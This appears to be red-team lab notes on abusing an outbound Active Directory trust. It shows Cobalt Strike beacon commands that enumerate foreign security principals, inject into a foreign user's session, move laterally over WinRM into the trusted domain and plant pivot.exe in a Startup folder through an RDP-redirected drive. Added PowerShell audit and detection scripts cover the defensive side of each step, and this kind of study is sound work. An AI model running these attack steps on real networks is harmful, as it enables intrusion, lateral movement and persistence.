One Way (Outbound)

List the foreign security principals in our current domain, i.e. accounts from the outbound (trusted) domain that have been added to groups in our domain. The SID shows up under CN=ForeignSecurityPrincipals because the object lives in the other domain.

beacon> powershell Get-DomainForeignGroupMember -Domain cyberbotic.io

GroupDomain             : cyberbotic.io
GroupName               : Jump Users
GroupDistinguishedName  : CN=Jump Users,CN=Users,DC=cyberbotic,DC=io
MemberDomain            : cyberbotic.io
MemberName              : S-1-5-21-3022719512-2989052766-178205875-1115
MemberDistinguishedName : CN=S-1-5-21-3022719512-2989052766-178205875-1115,CN=ForeignSecurityPrincipals,DC=cyberbotic,DC=io

Enumerate what this group can do on our own computers. We can't resolve the foreign SID to a username from here, because it belongs to the other domain, but we can still map the group to the hosts where GPOs place it in a local group.

beacon> powershell Get-DomainGPOUserLocalGroupMapping -Identity "Jump Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName

sql-1.cyberbotic.io
exch-1.cyberbotic.io

beacon> powershell Find-DomainLocalGroupMember -GroupName "Remote Desktop Users" | select -expand ComputerName

sql-1.cyberbotic.io
exch-1.cyberbotic.io

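The same relationship seen from the defender's side: the foreign SID in CN=ForeignSecurityPrincipals is a principal from the trusted (outbound) domain, and the groups it sits in are what grant it access to our hosts. The following PowerShell audit is an added example, not part of the original notes and not PowerView code; it uses the RSAT ActiveDirectory module (Get-ADTrust, Get-ADObject, Get-ADGroup) to list every foreign security principal in our domain, attribute each one to the trust it came from by matching the domain part of its SID, and flag membership in groups that commonly map to local admin or RDP rights. The sensitive-group list is an assumption: extend it with whatever groups your GPOs map to local groups.

```powershell
# Added example (not from the original notes): inventory foreign security principals
# in our own domain and the groups that grant them membership, using the RSAT
# ActiveDirectory module. Run from a domain-joined host as a user that can read
# the directory. Group and trust names come from whatever your directory returns.
Import-Module ActiveDirectory

function Get-ForeignPrincipalAudit {
    param(
        # Domain to audit; defaults to the current user's domain.
        [string]$Domain = $env:USERDNSDOMAIN,
        # Groups whose membership is worth a second look (assumption: extend to
        # any group your GPOs map to local Administrators / Remote Desktop Users).
        [string[]]$SensitiveGroups = @('Domain Admins', 'Administrators', 'Remote Desktop Users', 'Jump Users')
    )

    # Map each trusted domain's SID to its name and trust direction, so a foreign
    # SID can be attributed to the trust it came from even though it will not
    # resolve to a username from this domain.
    $trustBySid = @{}
    foreach ($t in Get-ADTrust -Filter * -Server $Domain) {
        if ($t.SecurityIdentifier) {
            $trustBySid[$t.SecurityIdentifier.Value] = "$($t.Name) ($($t.Direction))"
        }
    }

    $fsps = Get-ADObject -Server $Domain `
        -Filter 'objectClass -eq "foreignSecurityPrincipal"' `
        -Properties memberOf, objectSid

    foreach ($fsp in $fsps) {
        $sid = $fsp.objectSid.Value
        # Well-known SIDs such as S-1-5-11 (Authenticated Users) live in the FSP
        # container too but are not cross-domain accounts; skip them.
        if ($sid -notmatch '^S-1-5-21-') { continue }
        if (-not $fsp.memberOf) { continue }

        # Domain SID = account SID without the trailing RID.
        $domainSid = $sid.Substring(0, $sid.LastIndexOf('-'))
        $trustName = if ($trustBySid.ContainsKey($domainSid)) { $trustBySid[$domainSid] } else { 'unknown trust' }

        foreach ($groupDn in @($fsp.memberOf)) {
            # Memberships in other domains of the forest will not resolve against
            # $Domain; skip those rather than abort the audit.
            $group = Get-ADGroup -Identity $groupDn -Server $Domain -ErrorAction SilentlyContinue
            if (-not $group) { continue }
            [pscustomobject]@{
                ForeignSid  = $sid
                SourceTrust = $trustName
                Group       = $group.SamAccountName
                GroupScope  = $group.GroupScope
                IsSensitive = ($group.SamAccountName -in $SensitiveGroups)
            }
        }
    }
}

Get-ForeignPrincipalAudit | Sort-Object IsSensitive -Descending | Format-Table -AutoSize
```

Rows with IsSensitive set are the ones to reconcile against the GPO-to-local-group mappings, since a foreign principal in such a group is exactly what turns an outbound trust into an inbound path for whoever controls that principal.
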
Compromise these machines and wait until the targeted user logs in.

beacon> net logons
Logged on users at \\localhost:

ZPS\jean.wise
CYBER\SQL-1$

Two questions follow from a foreign logon like this:

  1. Does jean.wise have any privileged access in zeropointsecurity.local?
  2. Can we reach any useful ports/services (445, 3389, 5985 etc.) in zeropointsecurity.local?

beacon> portscan 10.10.18.0/24 139,445,3389,5985 none 1024

# Inject into a process running in the foreign user's session
beacon> inject 4960 x64 tcp-local
[+] established link to child beacon: 10.10.15.90

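For the blue team, the observable at this step is a logon on SQL-1 or EXCH-1 by an account whose domain is not ours (ZPS\jean.wise above). The following detection is an added example, not part of the original notes: it takes Security event 4624 records, keeps interactive, RDP and network logons by non-computer accounts, and flags any whose TargetDomainName is outside an allow-list. The allow-list (CYBER, CYBERBOTIC) and the three sample events are constructed for illustration; ConvertFrom-Logon4624 adapts live Get-WinEvent records to the same shape so the same filter runs on a real host.

```powershell
# Added example (not part of the original notes): flag logons on a host by accounts
# from a domain other than the ones we expect. This is the pattern of a user from
# the other side of an outbound trust signing in to a server where a foreign group
# has been granted Remote Desktop Users. Domain names and the sample events below
# are constructed for illustration.

function Find-ForeignDomainLogon {
    param(
        # Flat objects with TimeCreated, TargetUserName, TargetDomainName, LogonType, IpAddress.
        [Parameter(ValueFromPipeline)] $Event,
        # Domains whose logons are expected on this host (assumption: adjust per host).
        [string[]]$ExpectedDomains = @('CYBER', 'CYBERBOTIC')
    )
    process {
        # Interactive (2), network (3, e.g. WinRM/SMB) and RemoteInteractive/RDP (10) logons.
        if ($Event.LogonType -notin 2, 3, 10) { return }
        # Computer accounts end with $ and are noise for this check.
        if ($Event.TargetUserName.EndsWith('$')) { return }
        $expected = $ExpectedDomains | ForEach-Object { $_.ToUpper() }
        if ($Event.TargetDomainName.ToUpper() -in $expected) { return }
        [pscustomobject]@{
            Time      = $Event.TimeCreated
            Account   = "$($Event.TargetDomainName)\$($Event.TargetUserName)"
            LogonType = $Event.LogonType
            SourceIp  = $Event.IpAddress
            Reason    = 'logon by account from a domain not expected on this host'
        }
    }
}

# Flatten a live 4624 record into the shape above by reading its EventData XML.
function ConvertFrom-Logon4624 {
    param([Parameter(ValueFromPipeline)] [System.Diagnostics.Eventing.Reader.EventRecord]$Record)
    process {
        $x = [xml]$Record.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        [pscustomobject]@{
            TimeCreated      = $Record.TimeCreated
            TargetUserName   = $d['TargetUserName']
            TargetDomainName = $d['TargetDomainName']
            LogonType        = [int]$d['LogonType']
            IpAddress        = $d['IpAddress']
        }
    }
}

# Constructed sample: a service account network logon, a computer account, and an
# RDP logon by a user from a domain we do not expect on this host.
$sample = @(
    [pscustomobject]@{ TimeCreated = '2024-01-01T09:00:00'; TargetUserName = 'svc_backup'; TargetDomainName = 'CYBER'; LogonType = 3;  IpAddress = '10.10.15.20' }
    [pscustomobject]@{ TimeCreated = '2024-01-01T09:01:00'; TargetUserName = 'SQL-1$';     TargetDomainName = 'CYBER'; LogonType = 3;  IpAddress = '-' }
    [pscustomobject]@{ TimeCreated = '2024-01-01T09:02:00'; TargetUserName = 'jean.wise';  TargetDomainName = 'ZPS';   LogonType = 10; IpAddress = '10.10.18.50' }
)
$sample | Find-ForeignDomainLogon | Format-Table -AutoSize

# Live use on a member server (requires the Security log to be readable):
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624 } | ConvertFrom-Logon4624 | Find-ForeignDomainLogon
```

Only the jean.wise row should be reported for the sample. On a real jump host the expected-domain list is the allow-list to tune; anything outside it, especially a type 10 logon, is the event that precedes the session injection shown above.
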
From that session we can enumerate the external domain and access its machines as jean.wise.

beacon> remote-exec winrm sql01.zeropointsecurity.local whoami; hostname

zps\jean.wise
sql01

beacon> jump winrm64 sql01.zeropointsecurity.local pivot-sql-1
[+] established link to child beacon: 10.10.18.221

Or via the RDP-redirected drive share (\\tsclient) of the user's RDP session:

beacon> ls \\tsclient\c

beacon> cd \\tsclient\c\Users\jean.wise\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
beacon> upload C:\Payloads\pivot.exe
beacon> ls

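Two defender-side checks for the \\tsclient route, added here and not part of the original notes: the first verifies that the "Do not allow drive redirection" policy (fDisableCdm under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services) is set, which stops an RDP client's drives from being exposed inside the server session at all; the second lists recent executables and shortcuts in every user's Startup folder, the persistence location used above. Paths are the standard Windows ones; the seven-day window and the extension list are assumptions.

```powershell
# Added example (not from the original notes): hardening and detection checks for
# payloads placed through an RDP-redirected drive. (1) Confirm drive redirection
# is disabled by policy. (2) Report recently created files in the all-users and
# per-user Startup folders. Paths are the standard Windows locations.

function Test-RdpDriveRedirectionDisabled {
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services'
    $value = (Get-ItemProperty -Path $key -Name fDisableCdm -ErrorAction SilentlyContinue).fDisableCdm
    [pscustomobject]@{
        Policy   = 'fDisableCdm'
        Value    = if ($null -eq $value) { 'not set (redirection allowed)' } else { $value }
        Hardened = ($value -eq 1)
    }
}

function Get-StartupFolderItems {
    param(
        # Only report items created after this point (assumption: last 7 days).
        [datetime]$Since = (Get-Date).AddDays(-7)
    )
    # All-users Startup plus each profile's Startup folder.
    $paths = @("$env:ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp")
    $paths += Get-ChildItem -Path 'C:\Users' -Directory -ErrorAction SilentlyContinue |
        ForEach-Object { Join-Path $_.FullName 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' }

    # Extensions that execute (or, for .lnk, can hide a command line) when Explorer starts.
    $runnable = '.exe', '.dll', '.bat', '.cmd', '.ps1', '.vbs', '.js', '.lnk', '.hta', '.scr'

    foreach ($p in $paths) {
        if (-not (Test-Path $p)) { continue }
        Get-ChildItem -Path $p -File -Force -ErrorAction SilentlyContinue |
            Where-Object { $_.Name -ne 'desktop.ini' -and $_.CreationTime -ge $Since } |
            ForEach-Object {
                [pscustomobject]@{
                    Path       = $_.FullName
                    Created    = $_.CreationTime
                    Owner      = (Get-Acl -Path $_.FullName).Owner
                    Suspicious = ($_.Extension.ToLower() -in $runnable)
                }
            }
    }
}

Test-RdpDriveRedirectionDisabled
Get-StartupFolderItems | Sort-Object Created -Descending | Format-Table -AutoSize
```

A file in a user's Startup folder that was written while that user had an RDP session open, with no corresponding software install, is the artefact to look for; with fDisableCdm enforced the \\tsclient path is not available in the first place.
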